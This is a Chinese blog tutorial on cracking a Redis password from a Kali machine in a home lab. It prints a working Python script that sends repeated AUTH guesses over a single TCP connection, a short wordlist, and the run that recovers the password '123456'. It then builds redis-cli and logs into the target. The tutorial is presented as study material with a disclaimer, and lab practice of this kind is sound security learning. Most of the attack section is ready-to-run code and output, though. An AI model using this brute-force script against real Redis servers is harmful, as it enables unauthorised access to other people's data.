血的教训------入侵redis之利用python来破解redis密码

血的教训------入侵redis之利用python来破解redis密码

利用强大的python来进行redis的密码破解，过程不亦乐乎，当然也可以用shell脚本

本篇文章只供学习交流，请勿他用，谢谢。

其他相关联的文章
[1]VMware安装部署kail镜像服务器【详细包含百度云盘镜像】
[2]VMware上面安装部署centos7镜像系统【详细含镜像
[3]Centos7上面部署redis
[4]血的教训---入侵redis并远程控制你的机器场景复现

这里使用的是kail系统，主要原因有两点，1、可以吸引下大家，2、上面直接就有python，不用自己安装，当然了，咱这用的是python2也可以，普通的linux服务器上面也有，所以主要的原因就是第一点吧，哈哈哈哈

环境需要

操作系统	ip	描述
kail	192.168.126.138	使用python来进行redis的密码破解
centos7	192.168.126.129	部署redis-server，来被破解

直接看python脚本

想这种脚本，网上还是比较多的，主要是要找到一个可以自己使用的

#!/usr/bin/env python
# -*- coding: utf-8 -*-


import socket
import sys

redisCrackFile="passwd.txt"   #破解密码文件，需要单独准备

ip="192.168.144.128"   ###redis-server的ip地址
port=6379   ###redis-server的端口
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,port))      #建立tcp连接
with open(redisCrackFile,"r") as f:
    for i in f:
        s.send("auth %s " %(i))    #在一个tcp连接里多次使用auth命令猜测
        authResult=s.recv(1024)
        if '+OK' in authResult:
            print "the redis pass is:%s" %i
            s.close()
            sys.exit(0)

启动redis

如果不知道怎么部署redis，请看另一篇文章，切记一定要给redis配置密码，要不咱破解密码就是个寂寞

[root@localhost redis-3.0.4]# cd src/
[root@localhost src]# ./redis-server ../redis.conf
66895:M 27 Nov 00:17:24.602 * Increased maximum number of open files to 10032 (it was originally set to 1024).
                _._
           _.-``__ ''-._
      _.-``    `.  `_.  ''-._           Redis 3.0.4 (00000000/0) 64 bit
  .-`` .-```.  ```\/    _.,_ ''-._
 (    '      ,       .-`  | `,    )     Running in standalone mode
 |`-._`-...-` __...-.``-._|'` _.-'|     Port: 6379
 |    `-._   `._    /     _.-'    |     PID: 66895
  `-._    `-._  `-./  _.-'    _.-'
 |`-._`-._    `-.__.-'    _.-'_.-'|
 |    `-._`-._        _.-'_.-'    |           http://redis.io
  `-._    `-._`-.__.-'_.-'    _.-'
 |`-._`-._    `-.__.-'    _.-'_.-'|
 |    `-._`-._        _.-'_.-'    |
  `-._    `-._`-.__.-'_.-'    _.-'
      `-._    `-.__.-'    _.-'
          `-._        _.-'
              `-.__.-'

66895:M 27 Nov 00:17:24.604 # WARNING: The TCP backlog setting of 511 cannot be enforced because /proc/sys/net/core/somaxconn is set to the lower value of 128.
66895:M 27 Nov 00:17:24.604 # Server started, Redis version 3.0.4
66895:M 27 Nov 00:17:24.604 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
66895:M 27 Nov 00:17:24.604 # WARNING you have Transparent Huge Pages (THP) support enabled in your kernel. This will create latency and memory usage issues with Redis. To fix this issue run the command 'echo never > /sys/kernel/mm/transparent_hugepage/enabled' as root, and add it to your /etc/rc.local in order to retain the setting after a reboot. Redis must be restarted after THP is disabled.
66895:M 27 Nov 00:17:24.604 * The server is now ready to accept connections on port 6379

###redis-server已经正常启动，启动端口为6379

打开kail服务器

启动一个终端

准备passwd.txt密码本

┌──(liushuai㉿kali)-[~]
└─$ 
                                                                             
┌──(liushuai㉿kali)-[~]
└─$ vim passwd.txt           
                                                             
┌──(liushuai㉿kali)-[~]
└─$ cat passwd.txt 
1
2
3
4
aadas
fdfsd
fvsdfgd
gfdgdf
bdfgdf
123456
123
htrhdf4r3e4
adswerwe                                                                             
┌──(liushuai㉿kali)-[~]
└─$ 

如果需要其他的更强大的密码本的话，不建议来下面下载哈，哈哈
100亿以上精准密码字典

编写python脚本

┌──(liushuai㉿kali)-[~]
└─$ vim redis-stack.py
                                                                             
┌──(liushuai㉿kali)-[~]
└─$ cat redis-stack.py 
#!/usr/bin/env python
# -*- coding: utf-8 -*-


import socket
import sys

redisCrackFile="passwd.txt"   #破解密码文件

ip="192.168.126.129"
port=6379
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,port))      #建立tcp连接
with open(redisCrackFile,"r") as f:
    for i in f:
        s.send("auth %s " %(i))    #在一个tcp连接里多次使用auth命令猜测
        authResult=s.recv(1024)
        if '+OK' in authResult:
            print "the redis pass is:%s" %i
            s.close()
            sys.exit(0)

                                                                             
┌──(liushuai㉿kali)-[~]
└─$ 

执行脚本

┌──(liushuai㉿kali)-[~]
└─$ vim redis-stack.py
                                                                             
┌──(liushuai㉿kali)-[~]
└─$ python2 redis-stack.py
the redis pass is:123456

                                                                             
┌──(liushuai㉿kali)-[~]
└─$ 

主要看，咱们用的是python2，python3执行这个脚本会报错 ，如下：

kail默认的python是python3,这个脚本其实就print函数在2和3中有区别，2中的print函数不需要(),但是python3中需要print()。这个就是报错的原因，如果有兴趣的话，可以自己改一下脚本，然后再执行以下，看看效果

通过上图咱们已经知道了，redis的密码为123456

测试连接redis-server

如果要连接redis-server的话，我们就得需要一个redis-cli端，来进行连接，方法有很多中

获取redis-cli的方法，建议第二种

1、直接在部署redis-server的服务器上面把redis-cli这个二进制文件复制粘贴到我们的kail就可以使用，redis-cli与我们启动redis-server的是在一个目录下面

2、咱的kail上面直接安装部署一个redis,再者，安装部署也是非常简答粗暴的

部署redis服务

下载源码包

┌──(liushuai㉿kali)-[~]
└─$ wget https://download.redis.io/releases/redis-3.0.4.tar.gz   
--2023-11-27 13:40:23--  https://download.redis.io/releases/redis-3.0.4.tar.gz
Resolving download.redis.io (download.redis.io)... 45.60.125.1
Connecting to download.redis.io (download.redis.io)|45.60.125.1|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://download.redis.io/releases/redis-3.0.4.tar.gz [following]
--2023-11-27 13:40:38--  https://download.redis.io/releases/redis-3.0.4.tar.gz
Connecting to download.redis.io (download.redis.io)|45.60.125.1|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1364993 (1.3M) [application/octet-stream]
Saving to: 'redis-3.0.4.tar.gz'

redis-3.0.4.tar.gz  100%[================>]   1.30M  2.52MB/s    in 0.5s    

2023-11-27 13:40:39 (2.52 MB/s) - 'redis-3.0.4.tar.gz' saved [1364993/1364993]

解压源码包

┌──(liushuai㉿kali)-[~]
└─$ tar -xvf redis-3.0.4.tar.gz 
redis-3.0.4/
redis-3.0.4/.gitignore
redis-3.0.4/00-RELEASENOTES
redis-3.0.4/BUGS
redis-3.0.4/CONTRIBUTING
redis-3.0.4/COPYING
redis-3.0.4/INSTALL
redis-3.0.4/MANIFESTO
redis-3.0.4/Makefile
redis-3.0.4/README
redis-3.0.4/deps/
redis-3.0.4/deps/Makefile
redis-3.0.4/deps/hiredis/
redis-3.0.4/deps/hiredis/.gitignore
redis-3.0.4/deps/hiredis/.travis.yml
redis-3.0.4/deps/hiredis/CHANGELOG.md
redis-3.0.4/deps/hiredis/COPYING
redis-3.0.4/deps/hiredis/Makefile
********省略好多**********************
redis-3.0.4/utils/lru/
redis-3.0.4/utils/lru/README
redis-3.0.4/utils/lru/test-lru.rb
redis-3.0.4/utils/mkrelease.sh
redis-3.0.4/utils/redis-copy.rb
redis-3.0.4/utils/redis-sha1.rb
redis-3.0.4/utils/redis_init_script
redis-3.0.4/utils/redis_init_script.tpl
redis-3.0.4/utils/speed-regression.tcl
redis-3.0.4/utils/whatisdoing.sh

进行编译

──(liushuai㉿kali)-[~]
└─$ cd redis-3.0.4    
                                                                             
┌──(liushuai㉿kali)-[~/redis-3.0.4]
└─$ make && make install
cd src && make all
make[1]: Entering directory '/home/liushuai/redis-3.0.4/src'
rm -rf redis-server redis-sentinel redis-cli redis-benchmark redis-check-dump redis-check-aof *.o *.gcda *.gcno *.gcov redis.info lcov-html
(cd ../deps && make distclean)
make[2]: Entering directory '/home/liushuai/redis-3.0.4/deps'
(cd hiredis && make clean) > /dev/null || true
(cd linenoise && make clean) > /dev/null || true
(cd lua && make clean) > /dev/null || true
(cd jemalloc && [ -f Makefile ] && make distclean) > /dev/null || true
(rm -f .make-*)
make[2]: Leaving directory '/home/liushuai/redis-3.0.4/deps'
(rm -f .make-*)
echo STD=-std=c99 -pedantic >> .make-settings
echo WARN=-Wall -W >> .make-settings
echo OPT=-O2 >> .make-settings
echo MALLOC=jemalloc >> .make-settings
echo CFLAGS= >> .make-settings
echo LDFLAGS= >> .make-settings
echo REDIS_CFLAGS= >> .make-settings
echo REDIS_LDFLAGS= >> .make-settings
echo PREV_FINAL_CFLAGS=-std=c99 -pedantic -Wall -W -O2 -g -ggdb   -I../deps/hiredis -I../deps/linenoise -I../deps/lua/src -DUSE_JEMALLOC -I../deps/jemalloc/include >> .make-settings
echo PREV_FINAL_LDFLAGS=  -g -ggdb -rdynamic >> .make-settings
(cd ../deps && make hiredis linenoise lua jemalloc)
make[2]: Entering directory '/home/liushuai/redis-3.0.4/deps'
(cd hiredis && make clean) > /dev/null || true
(cd linenoise && make clean) > /dev/null || true
*****************省略好多*********************
redis-check-aof.c:141:9: note: in expansion of macro 'ERROR'
  141 |         ERROR("Reached EOF before reading EXEC for MULTI");
      |         ^~~~~
    LINK redis-check-aof

Hint: It's a good idea to run 'make test' ;)

make[1]: Leaving directory '/home/liushuai/redis-3.0.4/src'
cd src && make install
make[1]: Entering directory '/home/liushuai/redis-3.0.4/src'

Hint: It's a good idea to run 'make test' ;)

    INSTALL install
install: cannot create regular file '/usr/local/bin/redis-server': Permission denied
make[1]: *** [Makefile:249: install] Error 1
make[1]: Leaving directory '/home/liushuai/redis-3.0.4/src'
make: *** [Makefile:9: install] Error 2   ####发现有报错，但是我们不管他，因为这个不是我们主要要的
##我们主要要的是redis-cli这个命令
┌──(liushuai㉿kali)-[~/redis-3.0.4]
└─$ cd src  

┌──(liushuai㉿kali)-[~/redis-3.0.4/src]
└─$ ll redis-cli
-rwxr-xr-x 1 liushuai liushuai 2034704 Nov 27 13:47 redis-cli   ###看见这个二进制文件已经存在，我们测试下可以正常使用不

测试连接

┌──(liushuai㉿kali)-[~/redis-3.0.4/src]
└─$ ./redis-cli -h 192.168.126.129 -p 6379 -a 123456
192.168.126.129:6379> set a 6
OK
192.168.126.129:6379> get a
"6"
192.168.126.129:6379> 

经过测试，密码已经破解出来，并且可以正常连接redis-server

结束语

努力肯定很累，但是一定很快乐

可以看看其他相关联的文章
[1]VMware安装部署kail镜像服务器【详细包含百度云盘镜像】
[2]VMware上面安装部署centos7镜像系统【详细含镜像
[3]Centos7上面部署redis
[4]血的教训---入侵redis并远程控制你的机器场景复现